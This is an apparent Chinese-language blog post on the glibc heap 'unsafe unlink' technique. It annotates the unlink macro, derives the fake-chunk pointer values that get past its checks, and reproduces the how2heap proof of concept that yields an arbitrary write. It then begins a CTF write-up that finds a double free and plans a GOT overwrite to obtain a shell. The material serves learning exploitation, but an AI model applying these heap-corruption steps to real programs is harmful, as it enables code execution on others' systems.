<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>unsafe_unlink | chuwei'blog</title><meta name="author" content="chuwei"><meta name="copyright" content="chuwei"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="unsafe_unlinkunlink利用条件 UAF ，可修改 free 状态下 smallbin 或是 unsorted bin 的 fd 和 bk 指针 已知位置存在一个指针指向可进行 UAF 的 chunk  unlink源码#define unlink(AV, P, BK, FD) &amp;#123;                                            \">
<meta property="og:type" content="article">
<meta property="og:title" content="unsafe_unlink">
<meta property="og:url" content="http://wysyrg.github.io/2022/08/06/unsafe_unlink/index.html">
<meta property="og:site_name" content="chuwei&#39;blog">
<meta property="og:description" content="unsafe_unlinkunlink利用条件 UAF ，可修改 free 状态下 smallbin 或是 unsorted bin 的 fd 和 bk 指针 已知位置存在一个指针指向可进行 UAF 的 chunk  unlink源码#define unlink(AV, P, BK, FD) &amp;#123;                                            \">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://wysyrg.github.io/img/973119.jpg">
<meta property="article:published_time" content="2022-08-06T02:41:45.576Z">
<meta property="article:modified_time" content="2022-01-11T16:34:11.302Z">
<meta property="article:author" content="chuwei">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://wysyrg.github.io/img/973119.jpg"><link rel="shortcut icon" href="/img/1597994478373.jpeg"><link rel="canonical" href="http://wysyrg.github.io/2022/08/06/unsafe_unlink/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'unsafe_unlink',
  isPost: true,
  isHome: false,
  isHighlightShrink: undefined,
  isToc: true,
  postUpdate: '2022-01-12 00:34:11'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.2.0"><link rel="stylesheet" href="/css/prism-vs.css" type="text/css"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/1597994478373.jpeg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">42</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">7</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">2</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> 音乐</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> 电影</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="not-top-img" id="page-header"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">chuwei'blog</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> 音乐</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> 电影</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav></header><main class="layout" id="content-inner"><div id="post"><div id="post-info"><h1 class="post-title">unsafe_unlink</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-08-06T02:41:45.576Z" title="发表于 2022-08-06 10:41:45">2022-08-06</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-01-11T16:34:11.302Z" title="更新于 2022-01-12 00:34:11">2022-01-12</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="unsafe_unlink"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div><article class="post-content" id="article-container"><h2 id="unsafe-unlink"><a href="#unsafe-unlink" class="headerlink" title="unsafe_unlink"></a>unsafe_unlink</h2><h3 id="unlink利用条件"><a href="#unlink利用条件" class="headerlink" title="unlink利用条件"></a>unlink利用条件</h3><ol>
<li>UAF ，可修改 free 状态下 smallbin 或是 unsorted bin 的 fd 和 bk 指针</li>
<li>已知位置存在一个指针指向可进行 UAF 的 chunk</li>
</ol>
<h3 id="unlink源码"><a href="#unlink源码" class="headerlink" title="unlink源码"></a>unlink源码</h3><pre class=" language-lang-c"><code class="language-lang-c">#define unlink(AV, P, BK, FD) &#123;                                            \
    //判断chunk p的大小，是否与下一个chunk 的prev_size相等
    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
      malloc_printerr ("corrupted size vs. prev_size");               \
    //让FD指向p的下一个chunk，BK指向p的上一个chunk
    FD = P->fd;                                   \
    BK = P->bk;                                   \
    //以上是，chunk的大小在small bin范围内的断链操作
    //以下是，large bin，的断链操作，首先判断FD的bk，与BK的fd是否同时指向p
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))             \
      malloc_printerr ("corrupted double-linked list");               \
    else &#123;                                    \
        //首先进行初步断链，使FD的bk指向BK的fd，BK的fd指向FD，只是堆fd,bk的断链操作
        FD->bk = BK;                                  \
        BK->fd = FD;                                  \
        //以下使堆bk_nextsize,fd_nextsize的断链操作（large bin有两个双向链表，fd，bk用来
        //进行FIFO操作，bk_nextsize,fd_nextsize是根据堆块的大小进行排序的链表）
        //以下第一个if判断p的chunk是否在small范围内
        if (!in_smallbin_range (chunksize_nomask (P))                 \
            && __builtin_expect (P->fd_nextsize != NULL, 0)) &#123;            \
            //判断chunk p的下一个chunk的上一个节点，以及上一个chunk的下一个节点是不是p
        if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)        \
        || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
          malloc_printerr ("corrupted double-linked list (not small)");   \
          //以下是luoarge bin的断链操作，首先判断chunk p的下下一个chunk的fd_nextsize是否为空
            if (FD->fd_nextsize == NULL) &#123;                    \
            //p的下下一个chunk的fd_nextsize为空
                if (P->fd_nextsize == P)                      \
                //判断是否只有一个chunk p,是则如下
                  FD->fd_nextsize = FD->bk_nextsize = FD;             \
                else &#123;                                \
                //不是以下操作，四个指针，正常的双向链表的断链操作
                    FD->fd_nextsize = P->fd_nextsize;                 \
                    FD->bk_nextsize = P->bk_nextsize;                 \
                    P->fd_nextsize->bk_nextsize = FD;                 \
                    P->bk_nextsize->fd_nextsize = FD;                 \
                  &#125;                               \
              &#125; else &#123;                                \
              //p的下下一个chunk的fd_nextsize不为空，直接断链
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;             \
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;             \
              &#125;                                   \
          &#125;                                   \
      &#125;                                       \
&#125;
</code></pre>
<h3 id="unlink宏定义"><a href="#unlink宏定义" class="headerlink" title="unlink宏定义"></a>unlink宏定义</h3><pre class=" language-lang-c"><code class="language-lang-c">#define unlink(AV,P,BK,FD)
</code></pre>
<blockquote>
<ul>
<li>P:待取出的空闲chunk的指针</li>
<li>BK：P后一个chunk的指针</li>
<li>FD：P前一个chunk的指针</li>
</ul>
</blockquote>
<h3 id="大小检查"><a href="#大小检查" class="headerlink" title="大小检查"></a>大小检查</h3><pre class=" language-lang-c"><code class="language-lang-c">if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))   
      malloc_printerr ("corrupted size vs. prev_size");
</code></pre>
<blockquote>
<p>若p物理相邻的后一个chunk的prev_size位的值与当前待脱链的空闲chunk的size不相等时报错</p>
</blockquote>
<h3 id="双向链表完整性检查"><a href="#双向链表完整性检查" class="headerlink" title="双向链表完整性检查"></a>双向链表完整性检查</h3><pre class=" language-lang-c"><code class="language-lang-c">if (__builtin_expect (FD->bk != P || BK->fd != P, 0))            
      malloc_printerr ("corrupted double-linked list");
</code></pre>
<p>绕过该检查需要满足以下式子</p>
<pre class=" language-lang-c"><code class="language-lang-c">p->fd->bk == p  <=>  *(p->fd+0x18) == p
p->bk->fd == p  <=>  *(p->bk+0x10) == p
</code></pre>
<p>即</p>
<pre class=" language-lang-c"><code class="language-lang-c">p->fd=&p-0x18
p->bk=&p-0x10
</code></pre>
<h3 id="满足以上条件后，进入unlink脱链环节："><a href="#满足以上条件后，进入unlink脱链环节：" class="headerlink" title="满足以上条件后，进入unlink脱链环节："></a>满足以上条件后，进入unlink脱链环节：</h3><pre class=" language-lang-c"><code class="language-lang-c">// fd bk
if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) 
  malloc_printerr (check_action, "corrupted double-linked list", P, AV);
</code></pre>
<p>绕过该检查应该满足以下公式</p>
<pre class=" language-lang-c"><code class="language-lang-c">FD->bk = BK <=> p->fd->bk = p->bk <=> *(p->fd+0x18) = p->bk
∵p->fd = &p-0x18
∴*(&p-0x18+0x18) = p->bk
∴ p = p->bk
∵ p->bk = &p-0x10
∴ p = &p-0x10
</code></pre>
<pre class=" language-lang-c"><code class="language-lang-c">BK->fd = FD <=> p->bk->fd = p->fd <=> *(p->bk+0x10) = 
p->fd
∵p->bk = &p-0x10
∴*(&p-0x10+0x10) = p->fd
∴p = p->fd
∵p->fd = &p-0x18
∴p = &p-0x18
</code></pre>
<h3 id="若为largebin-还须进行进一步操作"><a href="#若为largebin-还须进行进一步操作" class="headerlink" title="若为largebin,还须进行进一步操作"></a>若为largebin,还须进行进一步操作</h3><blockquote>
<p>argebin 中还有 fdnextsize 以及 bknextsize 指针需要修改。</p>
<p>smallbin 中的 chunk 的 fdnextsize 和 bknextsize 是没有意义的，即使是 largebin，也只有在相同尺寸的同一组 chunks 中的第一个 chunk 中 fdnextsize 以及 bknextsize 才有意义。</p>
</blockquote>
<pre class=" language-lang-c"><code class="language-lang-c">if (!in_smallbin_range (P->size)                \
    && __builtin_expect (P->fd_nextsize != NULL, 0)) &#123;
    ...
&#125;
</code></pre>
<p>可见只有当 P-&gt;fdnextsize != null 时才需要修改，因为如果 P-&gt;fdnextsize == null ，说明 P 是尺寸相同的一组 chunks的非第一个 chunk，此时 P 的 fdnextsize 和 bknextsize 是没有意义的，自然没有修改的必要。</p>
<p>否则操作如下：</p>
<pre class=" language-lang-c"><code class="language-lang-c">if (FD->fd_nextsize == NULL) &#123;                    
                if (P->fd_nextsize == P)                      
                  FD->fd_nextsize = FD->bk_nextsize = FD;             
                else &#123;                                
                    FD->fd_nextsize = P->fd_nextsize;                 
                    FD->bk_nextsize = P->bk_nextsize;                 
                    P->fd_nextsize->bk_nextsize = FD;                 
                    P->bk_nextsize->fd_nextsize = FD;                 
                  &#125;                               
              &#125; else &#123;                                
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;             
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;             
              &#125;
</code></pre>
<blockquote>
<p>如果 FD-&gt;fd_nextsize == NULL ，那么 P 脱链后 FD 即成为当前尺寸相同的 chunks 的第一个 chunk。继续判断 P-&gt;fd_nextsize == P ，因为当 P 为仅有的唯一一组尺寸相同的 chunks 的第一个 chunk 的话，是需要特别对待的，否则 FD 直接继承 P 的 fdnextsize 以及 bknextsize 即可。如果 FD-&gt;fd_nextsize != NULL ，说明 FD 是下一组尺寸相同的 chunks 的第一个 chunk。</p>
</blockquote>
<h2 id="how2heap的unlink分析"><a href="#how2heap的unlink分析" class="headerlink" title="how2heap的unlink分析"></a>how2heap的unlink分析</h2><pre class=" language-lang-c"><code class="language-lang-c">#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>

uint64_t *chunk0_ptr;

int main()
&#123;
    setbuf(stdout, NULL);
    printf("Welcome to unsafe unlink 2.0!\n");
    printf("Tested in Ubuntu 14.04/16.04 64bit.\n");
    printf("This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n");
    printf("The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\n");

    int malloc_size = 0x80; //we want to be big enough not to use fastbins
    int header_size = 2;

    printf("The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n");

    chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
    uint64_t *chunk1_ptr  = (uint64_t*) malloc(malloc_size); //chunk1
    printf("The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
    printf("The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);

    printf("We create a fake chunk inside chunk0.\n");
    printf("We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.\n");
    chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
    printf("We setup the 'previous_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.\n");
    printf("With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) == False\n");
    chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
    printf("Fake chunk fd: %p\n",(void*) chunk0_ptr[2]);
    printf("Fake chunk bk: %p\n\n",(void*) chunk0_ptr[3]);

    printf("We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n");
    uint64_t *chunk1_hdr = chunk1_ptr - header_size;
    printf("We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n");
    printf("It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\n");
    chunk1_hdr[0] = malloc_size;
    printf("If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x90, however this is its new value: %p\n",(void*)chunk1_hdr[0]);
    printf("We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.\n\n");
    chunk1_hdr[1] &= ~1;

    printf("Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\n");
    printf("You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n\n");
    free(chunk1_ptr);

    printf("At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n");
    char victim_string[8];
    strcpy(victim_string,"Hello!~");
    chunk0_ptr[3] = (uint64_t) victim_string;

    printf("chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\n");
    printf("Original value: %s\n",victim_string);
    chunk0_ptr[0] = 0x4141414142424242LL;
    printf("New Value: %s\n",victim_string);

    // sanity check
    assert(*(long *)victim_string == 0x4141414142424242L);
&#125;
</code></pre>
<pre class=" language-lang-c"><code class="language-lang-c">该程序在Ubuntu14.04/16.04 64位中测试
当您在已知位置有指向可以调用unlink的区域的指针时，可以调用 unlink
最常见的情况是易受攻击的缓冲区，可能会溢出并具有全局指针
这个练习的重点是使用free来破坏全局chunk0_ptr来实现任意内存写。
全局chunk0_ptr位于0x602078，指向0x12a1010
我们要破坏的chunk在0x12a10a0
我们在chunk0中伪造一个假块。
我们设置 fake chunk 的 'next_free_chunk' (也就是 fd) 指向 &chunk0_ptr 使得 P->fd->bk = P.
我们设置 fake chunk 的 'previous_free_chunk' (也就是 bk) 指向 &chunk0_ptr 使得 P->bk->fd = P.
通过上面的设置可以绕过检查: (P->fd->bk != P || P->bk->fd != P) == False
fake chunk的fd: 0x602060
fake chunk的bk: 0x602068
我们假设chunk0中存在溢出漏洞，这样我们就可以更改chunk1的数据。
通过修改 chunk1 中 prev_size 的大小使得 chunk1 在 free 的时候误以为前面的 free chunk 是从我们伪造的 free chunk开始的
如果正常的 free chunk0 的话 chunk1 的 prev_size 应该是 0x90 但现在被改成了 0x80
通过将chunk1的'previous_in_use'设置为False，我们将伪造的堆块标记为空闲块。
现在释放掉 chunk1，会触发 unlink，合并两个 free chunk
此时，我们可以用 chunk0_ptr 覆盖自身以指向任意位置
Chunk0_ptr现在指向我们想要的位置，我们使用它来覆盖我们的victim string。
初始值:你好!～
新值:BBBBAAAA
</code></pre>
<p>进入调试</p>
<p>首先创建两个堆块</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220106173400643.png" alt="image-20220106173400643"></p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220106173426013.png" alt="image-20220106173426013"></p>
<p>然后再chunk0处伪造一个假块</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220106183601842.png" alt="image-20220106183601842"></p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220106184351893.png" alt="image-20220106184351893"></p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220106185229687.png" alt="image-20220106185229687"></p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220106200336332.png" alt="image-20220106200336332"></p>
<p>接下来释放掉 chunk1 因为 fake chunk 和 chunk1 是相邻的一个 free chunk，所以会将他两个合并，这就需要对 fake chunk 进行 unlink，此时chunk0_ptr=0x602060=chunk0_ptr[3]即p = &amp;p-0x18。chunk0_ptr指向的为chunk0的use_data,即指向fake chunk的pre_size.因此在这里p=chunk0_ptr;</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220106185251614.png" alt="image-20220106185251614"></p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220106185430766.png" alt="image-20220106185430766"></p>
<h2 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h2><p>接下来看一到unlink的题</p>
<p>参考的原文链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/Breeze_CAT/article/details/100427158">https://blog.csdn.net/Breeze_CAT/article/details/100427158</a></p>
<h3 id="首先对程序进行检查"><a href="#首先对程序进行检查" class="headerlink" title="首先对程序进行检查"></a>首先对程序进行检查</h3><p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220105182152889.png" alt="image-20220105182152889"></p>
<h3 id="进入ida对函数进行分析"><a href="#进入ida对函数进行分析" class="headerlink" title="进入ida对函数进行分析"></a>进入ida对函数进行分析</h3><p>用n对函数名进行修改，方便之后的观察</p>
<pre class=" language-lang-c"><code class="language-lang-c">__int64 __fastcall main(__int64 a1, char **a2, char **a3)
&#123;
  sub_4009FD(a1, a2, a3);
  init__();
  while ( 1 )
  &#123;
    switch ( menu() )
    &#123;
      case 1u:
        Display();
        break;
      case 2u:
        create();
        break;
      case 3u:
        edit();
        break;
      case 4u:
        delete();
        break;
      case 5u:
        puts("Bye");
        return 0LL;
      default:
        puts("Invalid!");
        break;
    &#125;
  &#125;
&#125;
</code></pre>
<p>首先是存放note信息的结构体</p>
<h4 id="初始化"><a href="#初始化" class="headerlink" title="初始化"></a>初始化</h4><pre class=" language-lang-c++"><code class="language-lang-c++">struct_list *init__()
&#123;
  struct_list *result; // rax
  int i; // [rsp+Ch] [rbp-4h]

  list = malloc(0x1810uLL);
  list->max_number = 256LL;
  result = list;
  list->now_number = 0LL;
  for ( i = 0; i <= 255; ++i )                  // //最多创建256个note结构体
  &#123;
    *(&list->struct_array.existence + 3 * i) = 0LL;
    *(&list->struct_array.length + 3 * i) = 0LL;
    result = (&list->struct_array.content + 3 * i);
    result->max_number = 0LL;
  &#125;
  return result;
&#125;
</code></pre>
<p>从该结构体以及之后的函数可以推测出该结构体</p>
<p> <img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220105204916321.png" alt="image-20220105204916321"></p>
<h4 id="输出note信息："><a href="#输出note信息：" class="headerlink" title="输出note信息："></a>输出note信息：</h4><pre class=" language-lang-c"><code class="language-lang-c">int Display()
&#123;
  __int64 max_number; // rax
  unsigned int i; // [rsp+Ch] [rbp-4h]

  if ( list->now_number <= 0 )        //没有note
  &#123;
    LODWORD(max_number) = puts("You need to create some new notes first.");
  &#125;
  else
  &#123;
    for ( i = 0; ; ++i )       //逐个输出note信息
    &#123;
      max_number = list->max_number;
      if ( i >= list->max_number )
        break;
      if ( *(&list->struct_array.existence + 3 * i) == 1 )
        printf("%d. %s\n", i, *(&list->struct_array.content + 3 * i));
    &#125;
  &#125;
  return max_number;
&#125;
</code></pre>
<h4 id="新增note"><a href="#新增note" class="headerlink" title="新增note"></a>新增note</h4><pre class=" language-lang-c"><code class="language-lang-c">int create()
&#123;
  __int64 max_number; // rax
  int i; // [rsp+Ch] [rbp-14h]
  int v3; // [rsp+10h] [rbp-10h]
  void *v4; // [rsp+18h] [rbp-8h]

  if ( list->now_number < list->max_number )
  &#123;
    for ( i = 0; ; ++i )
    &#123;
      max_number = list->max_number;
      if ( i >= list->max_number )
        break;
      if ( !*(&list->struct_array.existence + 3 * i) )
      &#123;
        printf("Length of new note: ");
        v3 = sub_40094E();
        if ( v3 > 0 )
        &#123;
          if ( v3 > 4096 )
            v3 = 4096;
          v4 = malloc((128 - v3 % 128) % 128 + v3);
          printf("Enter your note: ");
          sub_40085D(v4, v3);
          *(&list->struct_array.existence + 3 * i) = 1LL;
          *(&list->struct_array.length + 3 * i) = v3;
          *(&list->struct_array.content + 3 * i) = v4;
          ++list->now_number;
          LODWORD(max_number) = puts("Done.");
        &#125;
        else
        &#123;
          LODWORD(max_number) = puts("Invalid length!");
        &#125;
        return max_number;
      &#125;
    &#125;
  &#125;
  else
  &#123;
    LODWORD(max_number) = puts("Unable to create new note.");
  &#125;
  return max_number;
&#125;
</code></pre>
<pre class=" language-lang-c"><code class="language-lang-c">注意 v4 = malloc((128 - v3 % 128) % 128 + v3);
</code></pre>
<ul>
<li>注意这里对note—&gt;content进行了对齐操作,其宽度为128字节</li>
</ul>
<h4 id="修改note"><a href="#修改note" class="headerlink" title="修改note"></a>修改note</h4><pre class=" language-lang-c"><code class="language-lang-c">int edit()
&#123;
  struct_list *v1; // rbx
  int v2; // [rsp+4h] [rbp-1Ch]
  int v3; // [rsp+8h] [rbp-18h]

  printf("Note number: ");
  v3 = sub_40094E();
  if ( v3 < 0 || v3 >= list->max_number || *(&list->struct_array.existence + 3 * v3) != 1 )
    return puts("Invalid number!");
  printf("Length of note: ");
  v2 = sub_40094E();
  if ( v2 <= 0 )
    return puts("Invalid length!");
  if ( v2 > 4096 )
    v2 = 4096;
  if ( v2 != *(&list->struct_array.length + 3 * v3) )
  &#123;
    v1 = list;
    *(&v1->struct_array.content + 3 * v3) = realloc(
                                              *(&list->struct_array.content + 3 * v3),
                                              (128 - v2 % 128) % 128 + v2);
    *(&list->struct_array.length + 3 * v3) = v2;
  &#125;
  printf("Enter your note: ");
  sub_40085D(*(&list->struct_array.content + 3 * v3), v2);
  return puts("Done.");
&#125;
</code></pre>
<p>这里检验了note_number是否在0-max—&gt;number之间,并检查了note-&gt;existence是否有效</p>
<h4 id="删除note"><a href="#删除note" class="headerlink" title="删除note"></a>删除note</h4><pre class=" language-lang-c"><code class="language-lang-c">int delete()
&#123;
  int v1; // [rsp+Ch] [rbp-4h]

  if ( list->now_number <= 0 )
    return puts("No notes yet.");
  printf("Note number: ");
  v1 = sub_40094E();
  if ( v1 < 0 || v1 >= list->max_number )
    return puts("Invalid number!");
  --list->now_number;
  *(&list->struct_array.existence + 3 * v1) = 0LL;
  *(&list->struct_array.length + 3 * v1) = 0LL;
  free(*(&list->struct_array.content + 3 * v1));
  return puts("Done.");
&#125;
</code></pre>
<p>这里只对note_number是否在0-max—&gt;number之间进行了检验,没有检查note-&gt;existence是否有效,free之后也没有将note索引中的对应<strong>指针清空</strong>，也没有检查对应的索引中的<strong>是否存在位</strong>,因此存在double free;另外注意到将 flag 和 length 清零，而后 free 掉 buf ，<strong>没有置空指针</strong>，但是这个位只在edit函数中被校验，防止我们Use After Free</p>
<h3 id="漏洞利用思路"><a href="#漏洞利用思路" class="headerlink" title="漏洞利用思路"></a>漏洞利用思路</h3><p>那么现在只有double  free漏洞可以利用我们就需要考虑还需要什么，程序开启了ASLR。我们不能获取libc的装载地址，但没有开启PIE，我们就可以获取got表的地址，可以通过double free漏洞然后接unlink来修改got表实现getshell.但是我们需要一个信息去读取地址</p>
<p>注意到在建立新note的时候在note的结尾处没有加”\0″因此会造成堆或者栈的地址泄露</p>
<pre class=" language-lang-c"><code class="language-lang-c">__int64 __fastcall sub_40085D(__int64 a1, int a2)
&#123;
  int i; // [rsp+18h] [rbp-8h]
  int v4; // [rsp+1Ch] [rbp-4h]

  if ( a2 <= 0 )
    return 0LL;
  for ( i = 0; i < a2; i += v4 )
  &#123;
    v4 = read(0, (a1 + i), a2 - i);
    if ( v4 <= 0 )
      break;
  &#125;
  return i;
&#125;
</code></pre>
<p>linux下块的结构如下图所示</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/image-20220105212234289.png" alt="image-20220105212234289"></p>
